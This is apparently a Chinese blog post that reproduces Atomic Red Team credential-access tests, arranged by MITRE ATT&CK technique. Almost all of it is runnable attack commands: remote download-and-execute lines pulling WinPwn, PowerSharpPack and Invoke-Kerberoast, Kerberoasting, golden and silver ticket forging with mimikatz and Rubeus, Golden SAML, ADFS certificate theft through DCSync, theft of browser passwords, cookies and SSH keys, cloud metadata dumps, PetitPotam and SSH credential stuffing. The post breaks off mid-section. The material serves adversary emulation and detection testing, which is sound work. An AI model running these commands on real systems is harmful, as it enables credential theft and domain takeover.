526互联

Atomic-凭据访问

发布时间 2023-06-20 10:57:13作者: 皇帽讲绿帽带法技巧
credential-access
T1649
Steal or Forge Authentication Certificates

T1606.002
Forge Web Credentials: SAML token

T1558.004
Steal or Forge Kerberos Tickets: AS-REP Roasting

T1558.003
Steal or Forge Kerberos Tickets: Kerberoasting

T1558.002
Steal or Forge Kerberos Tickets: Silver Ticket

T1558.001
Steal or Forge Kerberos Tickets: Golden Ticket

T1555
Credentials from Password Stores

T1555.004
Credentials from Password Stores: Windows Credential Manager

T1555.003
Credentials from Password Stores: Credentials from Web Browsers

T1555.001
Credentials from Password Stores: Keychain

T1552
Unsecured Credentials

T1552.007
Kubernetes List Secrets

T1552.006
Unsecured Credentials: Group Policy Preferences

T1552.005
Unsecured Credentials: Cloud Instance Metadata API

T1552.004
Unsecured Credentials: Private Keys

T1552.003
Unsecured Credentials: Bash History

T1552.002
Unsecured Credentials: Credentials in Registry

T1552.001
Unsecured Credentials: Credentials In Files

T1539
Steal Web Session Cookie

T1528
Steal Application Access Token

T1187
Forced Authentication

T1110.004
Brute Force: Credential Stuffing

T1110.003
Brute Force: Password Spraying

T1110.002
Brute Force: Password Cracking

T1110.001
Brute Force: Password Guessing

T1056.004
Input Capture: Credential API Hooking

T1056.002
Input Capture: GUI Input Capture

T1056.001
Input Capture: Keylogging

T1003
OS Credential Dumping

T1003.008
OS Credential Dumping: /etc/passwd and /etc/shadow

T1003.007
OS Credential Dumping: Proc Filesystem

T1003.006
OS Credential Dumping: DCSync

T1003.005
OS Credential Dumping: Cached Domain Credentials

T1003.004
OS Credential Dumping: LSA Secrets

T1003.003
OS Credential Dumping: NTDS

T1003.002
OS Credential Dumping: Security Account Manager

T1003.001
OS Credential Dumping: LSASS Memory

T1649

Steal or Forge Authentication Certificates

Atomic Test #1 - staging-local-certificates-via-export-certificate

导入本地证书并存储

$archive="$env:PUBLIC\T1649\atomic_certs.zip"
$exfilpath="$env:PUBLIC\T1649\certs"
Add-Type -assembly "system.io.compression.filesystem"
Remove-Item $(split-path $exfilpath) -Recurse -Force -ErrorAction Ignore
mkdir $exfilpath | Out-Null
foreach ($cert in (gci Cert:\CurrentUser\My)) { Export-Certificate -Cert $cert -FilePath $exfilpath\$($cert.FriendlyName).cer}
[io.compression.zipfile]::CreateFromDirectory($exfilpath, $archive)

T1606 .002

Forge Web Credentials: SAML token

Atomic Test #1 - golden-saml

伪造 Web 凭据,SAML 令牌

Import-Module AADInternals -Force
$saml = New-AADIntSAMLToken -ImmutableID "#{immutable_id}" -PfxFileName "#{certificate_path}" -Issuer "#{issuer_uri}"
$conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache
if ($conn) { Write-Host "`nSuccessfully connected as $($conn.User)" } else { Write-Host "`nThe connection failed" }
Write-Host "End of Golden SAML"

T1558.004

Steal or Forge Kerberos Tickets: AS-REP Roasting

窃取或伪造 Kerberos 票据,进行 AS-REP Roasting

Rubeus astrproast

cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}"

Get-DomainUser with PowerView

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose

WinPwn - PowerSharpPack - Kerberoasting Using Rubeus

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
Invoke-Rubeus -Command "asreproast /format:hashcat /nowrap"

T1558.003

Steal or Forge Kerberos Tickets: Kerberoasting

窃取或伪造 Kerberos 票据,进行 Kerberoasting

Request for service tickets

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
Invoke-Kerberoast | fl

Rubeus kerberoast

klist purge
cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"

Extract all accounts in use as SPN using setspn

setspn -T #{domain_name} -Q */*

Request A Single Ticket via PowerShell

Add-Type -AssemblyName System.IdentityModel
$ComputerFQDN=$env:LogonServer.trimStart('\') + "." + $env:UserDnsDomain
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/$ComputerFQDN"

Request All Tickets via PowerShell

Add-Type -AssemblyName System.IdentityModel  
setspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

WinPwn - Kerberoasting

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Kerberoasting -consoleoutput -noninteractive

WinPwn - PowerSharpPack - Kerberoasting Using Rubeus

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap"

T1558.002

Steal or Forge Kerberos Tickets: Silver Ticket

窃取或伪造 Kerberos 票据,Silver Ticket

Crafting Active Directory silver tickets with mimikatz

Remove-Item $env:TEMP\silver.bat -ErrorAction Ignore
Remove-Item $env:TEMP\silver.txt -ErrorAction Ignore

# get current domain SID if default was used
$domain_sid = "#{domain_sid}"
If ($domain_sid -Match "DEFAULT") {
  # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60
  $domain = gwmi Win32_ComputerSystem | Select -Expand Domain
  $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value
  $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))
}

# create batch file with commands to run in a separate "runas /netonly" session
# so we don't purge Kerberos ticket from the current Windows session
# its output goes to silver.txt temp file, because we cannot capture "runas /netonly" output otherwise
@"
>%TEMP%\silver.txt 2>&1 (
  echo Purge existing tickets and create silver ticket:
  klist purge
  #{mimikatz_path} "kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{service_aes256_key} /user:#{account} /service:HOST /target:#{target}.#{domain} /ptt" "exit"

  echo.
  echo executing:schtasks /query /S #{target}.#{domain}
  schtasks /query /S #{target}.#{domain}
  
  echo.
  echo Tickets after requesting schtasks:
  klist

  echo.
  echo End of Silver Ticket attack
)
"@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\silver.bat

# run batch file in a new empty session (password and username do not matter)
echo "foo" | runas /netonly /user:fake "$env:TEMP\silver.bat" | Out-Null

# wait until the output file has logged the entire attack
do {
  Start-Sleep 1 # wait a bit so the output file has time to be created
  Get-Content -Path "$env:TEMP\silver.txt" -Wait | ForEach-Object {
    if ($_ -match 'End of Silver Ticket attack') { break } 
  }
} while ($false) # dummy loop so that 'break' can be used

# show output from new empty session
Get-Content $env:TEMP\silver.txt

# cleanup temp files
Remove-Item $env:TEMP\silver.bat -ErrorAction Ignore
Remove-Item $env:TEMP\silver.txt -ErrorAction Ignore

T1558.001

Steal or Forge Kerberos Tickets: Golden Ticket

窃取或伪造 Kerberos 票据,Golden Ticket

Crafting Active Directory golden tickets with mimikatz

Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore

# get current domain SID if default was used
$domain_sid = "#{domain_sid}"
If ($domain_sid -Match "DEFAULT") {
  # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60
  $domain = gwmi Win32_ComputerSystem | Select -Expand Domain
  $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value
  $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))
}

# create batch file with commands to run in a separate "runas /netonly" session
# so we don't purge Kerberos ticket from the current Windows session
# its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
@"
>%TEMP%\golden.txt 2>&1 (
  echo Purge existing tickets and create golden ticket:
  klist purge
  #{mimikatz_path} "kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt" "exit"

  echo.
  echo Requesting SYSVOL:
  dir \\#{domain}\SYSVOL
  
  echo.
  echo Tickets after requesting SYSVOL:
  klist

  echo.
  echo End of Golden Ticket attack
)
"@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat

# run batch file in a new empty session (password and username do not matter)
echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null

# wait until the output file has logged the entire attack
do {
  Start-Sleep 1 # wait a bit so the output file has time to be created
  Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object {
    if ($_ -match 'End of Golden Ticket attack') { break } 
  }
} while ($false) # dummy loop so that 'break' can be used

# show output from new empty session
Get-Content $env:TEMP\golden.txt

# cleanup temp files
Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore

Crafting Active Directory golden tickets with Rubeus

Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore

cmd.exe /c "#{local_folder}\#{local_executable}" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden
$filename = (Get-ChildItem | ? {$_.Name.startswith("golden_")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name

# create batch file with commands to run in a separate "runas /netonly" session
# so we don't purge Kerberos ticket from the current Windows session
# its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
@"
>%TEMP%\golden.txt 2>&1 (
  echo Purge existing tickets and create golden ticket:
  klist purge
  cd %temp%
  "#{local_folder}\#{local_executable}" ptt /ticket:kirbifile

  echo.
  echo Requesting SYSVOL:
  dir \\$(#{domaincontroller})\SYSVOL
  
  echo.
  echo Tickets after requesting SYSVOL:
  klist

  echo.
  echo End of Golden Ticket attack
)
"@ -Replace "kirbifile", $filename | Out-File -Encoding OEM $env:TEMP\golden.bat

# run batch file in a new empty session (password and username do not matter)
echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null

# wait until the output file has logged the entire attack
do {
  Start-Sleep 1 # wait a bit so the output file has time to be created
  Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object {
    if ($_ -match 'End of Golden Ticket attack') { break } 
  }
} while ($false) # dummy loop so that 'break' can be used

# show output from new empty session
Get-Content $env:TEMP\golden.txt

# cleanup temp files
Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore

T1555

Credentials from Password Stores

密码仓库的凭据

Extract Windows Credential Manager via VBA

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"

Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]

IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force

Dump credentials from Windows Credential Manager With PowerShell [web Credentials]

IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force

Enumerate credentials from Windows Credential Manager using vaultcmd. exe [Windows Credentials]

vaultcmd /listcreds:"Windows Credentials" /all

Enumerate credentials from Windows Credential Manager using vaultcmd. exe [Web Credentials]

vaultcmd /listcreds:"Web Credentials" /all

WinPwn - Loot local Credentials - lazagne

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
lazagnemodule -consoleoutput -noninteractive

WinPwn - Loot local Credentials - Wifi Credentials

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
wificreds -consoleoutput -noninteractive

WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
decryptteamviewer -consoleoutput -noninteractive

T1555.004

Credentials from Password Stores: Windows Credential Manager

密码参考的凭据:Windows 凭据管理

Access Saved Credentials via VaultCmd

vaultcmd /listcreds:"Windows Credentials"

WinPwn - Loot local Credentials - Invoke-WCMDump

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/DumpWCM.ps1')
Invoke-WCMDump

T1555.003

Credentials from Password Stores: Credentials from Web Browsers

密码参考的凭据:Web 浏览器凭据

Run Chrome-password Collector

Set-Location -path "#{file_path}\Sysinternals";
./accesschk.exe -accepteula .;

Search macOS Safari Cookies

cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"

LaZagne - Credentials from Browser

PathToAtomicsFolder\T1555.003\bin\LaZagne.exe browsers

Simulating access to Chrome Login Data

Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" -Destination PathToAtomicsFolder\..\ExternalPayloads
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data For Account" -Destination PathToAtomicsFolder\..\ExternalPayloads

Simulating access to Opera Login Data

Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination PathToAtomicsFolder\..\ExternalPayloads

Simulating access to Windows Firefox Login Data

Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination PathToAtomicsFolder\..\ExternalPayloads -Force -Recurse

Simulating access to Windows Edge Login Data

Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination PathToAtomicsFolder\..\ExternalPayloads\Edge -Force -Recurse

Decrypt Mozilla Passwords with Firepwd. py

$PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
cat #{Out_Filepath}

LaZagne. py - Dump Credentials from Firefox Browser

python3 #{lazagne_path}/laZagne.py #{specific_module} >> #{output_file}

$exfil_folder = "$env:temp\T1555.003"
if (test-path "$exfil_folder") {} else {new-item -path "$env:temp" -Name "T1555.003" -ItemType "directory" -force}
$FirefoxCredsLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
if (test-path "$FirefoxCredsLocation\key4.db") {copy-item "$FirefoxCredsLocation\key4.db" -destination "$exfil_folder\T1555.003Firefox_key4.db"} else {}
if (test-path "$FirefoxCredsLocation\logins.json") {copy-item "$FirefoxCredsLocation\logins.json" -destination "$exfil_folder\T1555.003Firefox_logins.json"} else {}
if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -destination "$exfil_folder\T1555.003Chrome_Login Data"} else {}
if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account" -destination "$exfil_folder\T1555.003Chrome_Login Data For Account"} else {}
if (test-path "$env:appdata\Opera Software\Opera Stable\Login Data") {copy-item "$env:appdata\Opera Software\Opera Stable\Login Data" -destination "$exfil_folder\T1555.003Opera_Login Data"} else {}
if (test-path "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data") {copy-item "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data" -destination "$exfil_folder\T1555.003Edge_Login Data"} else {} 
compress-archive -path "$exfil_folder" -destinationpath "$exfil_folder.zip" -force

WinPwn - BrowserPwn

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
browserpwn -consoleoutput -noninteractive

WinPwn - Loot local Credentials - mimi-kittenz

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
kittenz -consoleoutput -noninteractive

WinPwn - PowerSharpPack - Sharpweb for Browser

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')
Invoke-Sharpweb -command "all"

Simulating Access to Chrome Login Data - MacOS

cp ~/Library/"Application Support/Google/Chrome/Default/Login Data" "/tmp/T1555.003_Login Data"
cp ~/Library/"Application Support/Google/Chrome/Default/Login Data For Account" "/tmp/T1555.003_Login Data For Account"

WebBrowserPassView - Credentials from Browser

Start-Process #{webbrowserpassview_path}
Start-Sleep -Second 4
Stop-Process -Name "WebBrowserPassView"

BrowserStealer (Chrome / Firefox / Microsoft Edge)

Copy-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -Destination "PathToAtomicsFolder\..\ExternalPayloads" > $null
Remove-Item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" > $null
Copy-Item "$env:PathToAtomicsFolder\T1555.003\src\Login Data" -Destination "$env:localappdata\Google\Chrome\User Data\Default\" > $null
cd "$env:PathToAtomicsFolder\T1555.003\bin"
.\BrowserCollector.exe

T1555.001

Credentials from Password Stores: Keychain

密码存储的凭据:Keychain

security -h
security find-certificate -a -p > #{cert_export}
security import #{cert_export} -k

T1552

Unsecured Credentials

不安全的凭据

export AWS_REGION=#{aws_region} 
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.credential-access.ec2-get-password-data
echo "starting detonate"
./stratus detonate aws.credential-access.ec2-get-password-data --force

T1552.007

Kubernetes List Secrets

Kubernetes 列表秘密

List All Secrets

kubectl get secrets --all-namespaces

ListSecrets

kubectl get secrets -n #{namespace}

Cat the contents of a Kubernetes service account token file

kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token

T1552.006

Unsecured Credentials: Group Policy Preferences

不安全的凭据:组策略选项

GPP Passwords (findstr)

findstr /S cpassword %logonserver%\sysvol\*.xml

GPP Passwords (Get-GPPPassword)

. #{gpp_script_path}
Get-GPPPassword -Verbose

T1552.005

Unsecured Credentials: Cloud Instance Metadata API

不安全的凭据:云实例 Metadata API

Azure - Search Azure AD User Attributes for Passwords

import-module msonline
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-MsolService -Credential $Credential
$users = Get-MsolUser -All;
foreach($user in $users)
{$props = @();$user | Get-Member | foreach-object{$props+=$_.Name}; 
foreach($prop in $props)
{if($user.$prop -like "*password*")
{("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop) | out-file -filepath $env:temp\T1552.005Test1.txt -append -force}}}
get-content -path $env:temp\T1552.005Test1.txt -erroraction silentlycontinue

Azure - Dump Azure Instance Metadata from Virtual Machines

Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | ConvertTo-Json -Depth 64 > #{output_file}

T1552.004

Unsecured Credentials: Private Keys

不安全的凭据:私钥

Private Keys

dir c:\ /b /s .key | findstr /e .key

Discover Private SSH Keys

find #{search_path} -name id_rsa 2>/dev/null >> #{output_file}
exit 0

Copy Private SSH Keys with CP

mkdir #{output_folder}
find #{search_path} -name id_rsa 2>/dev/null -exec cp --parents {} #{output_folder} \;
exit 0

Copy Private SSH Keys with rsync

mkdir #{output_folder}
find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \;
exit 0

Copy the users GnuPG directory with rsync

mkdir #{output_folder}
find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \;
exit 0

ADFS token signing and encryption certificates theft - Local

Import-Module AADInternals -Force
Export-AADIntADFSCertificates
Get-ChildItem | Where-Object {$_ -like "ADFS*"}
Write-Host "`nCertificates retrieved successfully"

ADFS token signing and encryption certificates theft - Remote

Import-Module ActiveDirectory -Force 
Import-Module AADInternals -Force | Out-Null
#Get Configuration
$dcServerName = (Get-ADDomainController).HostName
$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq "#{adfs_service_account_name}"
$PWord = ConvertTo-SecureString -String "#{replication_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord
# use DCSync to fetch the ADFS service account's NT hash
$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex
$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}
# Get certificates decryption key
$Configuration = [xml]$ADFSConfig
$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group
$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName
$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn
$base = "LDAP://CN=$group,$container,$parent"
$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))
$ADSearch.Filter = '(name=CryptoPolicy)'
$ADSearch.PropertiesToLoad.Clear()
$ADSearch.PropertiesToLoad.Add("displayName") | Out-Null
$aduser = $ADSearch.FindOne()
$keyObjectGuid = $ADUser.Properties["displayName"] 
$ADSearch.PropertiesToLoad.Clear()
$ADSearch.PropertiesToLoad.Add("thumbnailphoto") | Out-Null
$ADSearch.Filter="(l=$keyObjectGuid)"
$aduser=$ADSearch.FindOne() 
$key=[byte[]]$aduser.Properties["thumbnailphoto"][0] 
# Get encrypted certificates from configuration and decrypt them
Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key
Get-ChildItem | Where-Object {$_ -like "ADFS*"}
Write-Host "`nCertificates retrieved successfully"

CertUtil ExportPFX

IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) 
certutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 #{output}

Export Root Certificate with Export-PFXCertificate

$mypwd = ConvertTo-SecureString -String "AtomicRedTeam" -Force -AsPlainText
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
Set-Location Cert:\LocalMachine\My
Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath #{pfx_path} -Password $mypwd

Export Root Certificate with Export-Certificate

$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
Set-Location Cert:\LocalMachine\My
Export-Certificate -Type CERT -Cert  Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}

Export Certificates with Mimikatz

#{mimikatz_exe} "crypto::certificates /systemstore:local_machine /store:my /export"  exit

T1552.003

Unsecured Credentials: Bash History

不安全的凭据:Bash History

cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}

T1552.002

Unsecured Credentials: Credentials in Registry

不安全的凭据:在注册表中的凭据

Enumeration for Credentials in Registry

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Enumeration for PuTTY Credentials in Registry

reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s

T1552.001

Unsecured Credentials: Credentials In Files

不安全的凭据:在文件中的凭据

Find AWS credentials

find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null

Extract Browser and System credentials with LaZagne

python2 laZagne.py all

Extract passwords with grep

grep -ri password #{file_path}
exit 0

Extracting passwords with findstr

findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password

Access unattend. xml

type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml

Find and Access Github Credentials

for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done

WinPwn - sensitivefiles

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

WinPwn - Snaffler

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput

WinPwn - powershellsensitive

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive

WinPwn - passhunt

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive

WinPwn - SessionGopher

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput

WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive

T1539

Steal Web Session Cookie

窃取网络会话 cookie

Steal Firefox Cookies (Windows)

stop-process -name "firefox" -force -erroraction silentlycontinue
$CookieDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*\cookies.sqlite"
"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];" | cmd /c #{sqlite3_path} "$CookieDBLocation" | out-file -filepath "#{output_file}"

Steal Chrome Cookies (Windows)

stop-process -name "chrome" -force -erroraction silentlycontinue
"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];" | cmd /c #{sqlite3_path} "#{cookie_db}" | out-file -filepath "#{output_file}"

T1528

Steal Application Access Token

窃取应用访问 token

Azure - Dump All Azure Key Vaults with Microburst

import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-AzureRmAccount -Credential $Credential
Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
cat #{output_file}

T1187

Forced Authentication

强制认证

PetitPotam

& "#{petitpotam_path}" #{captureServerIP} #{targetServerIP} #{efsApi}
Write-Host "End of PetitPotam attack"

WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"

T1110.004

Brute Force: Credential Stuffing

暴力破解:凭据填充

SSH Credential Stuffing From Linux

cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done

SSH Credential Stuffing From MacOS

cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
